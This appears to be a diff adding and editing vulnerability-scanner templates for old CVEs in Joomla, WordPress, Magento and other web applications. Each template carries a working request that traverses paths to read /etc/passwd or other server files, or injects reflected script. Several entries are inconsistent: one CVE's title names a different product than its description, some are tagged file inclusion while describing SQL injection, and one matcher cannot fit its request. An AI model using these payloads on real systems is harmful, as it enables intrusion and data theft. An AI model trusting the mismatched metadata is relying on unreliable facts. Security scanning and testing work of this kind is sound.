matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2507.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2507
info:
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2680.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2857.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
reference: |
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2918.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
reference:
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-3203.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
reference: |
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4282.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4282
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4719.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4769.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4977.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4977
info:
name: Joomla! Component Canteen 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-5028.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5028
info:
name: Joomla! Component JE Job 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
reference:
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-5286.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2011-2744.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
tags: cve,cve2011,lfi,chyrp
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0896.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0896
info:
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author: daffainfo
severity: high
description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0981.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0996.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0996
info:
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
reference:
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-1226.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-1226
info:
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

5
CVE-2013-7240.yaml
View File

@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22
requests:
- method: GET

27
CVE-2014-10037.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

37
CVE-2014-4539.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.cookie)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4544.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4544
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4550.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4558.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4561.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4592.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
CVE-2014-5111.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2014-5258.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

5
CVE-2014-9094.yaml
View File

@ -4,9 +4,9 @@ info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
@ -18,7 +18,6 @@ requests:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header

2
CVE-2015-1000012.yaml
View File

@ -7,13 +7,13 @@ info:
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET

27
CVE-2015-2067.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-2067
info:
name: Magento Server Magmi Plugin - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
tags: cve,cve2015,lfi,magento
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-2068.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-2068
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,xss
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

27
CVE-2015-4414.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2015-4414
info:
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/37274
- https://www.cvedetails.com/cve/CVE-2015-4414
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-4632.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference: |
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
tags: cve,cve2015,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-4632
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-6920.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

32
CVE-2015-7377.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-7377
info:
name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference:
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
tags: cve,cve2015,wordpress,wp-plugin,xss
description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI."
requests:
- method: GET
path:
- "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

39
CVE-2015-7780.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2015-7780
info:
name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal
author: daffainfo
severity: medium
description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0.
reference:
- https://www.exploit-db.com/exploits/35933
- https://www.cvedetails.com/cve/CVE-2015-7780/
tags: cve,cve2015,lfi,manageengine
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cve-id: CVE-2015-7780
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</web-app>"
- "java.sun.com"
part: body
condition: and
- type: word
part: header
words:
- "application/xml"

37
CVE-2016-1000136.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2016-1000136
info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000136
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2016-1000142.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2016-1000142
info:
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
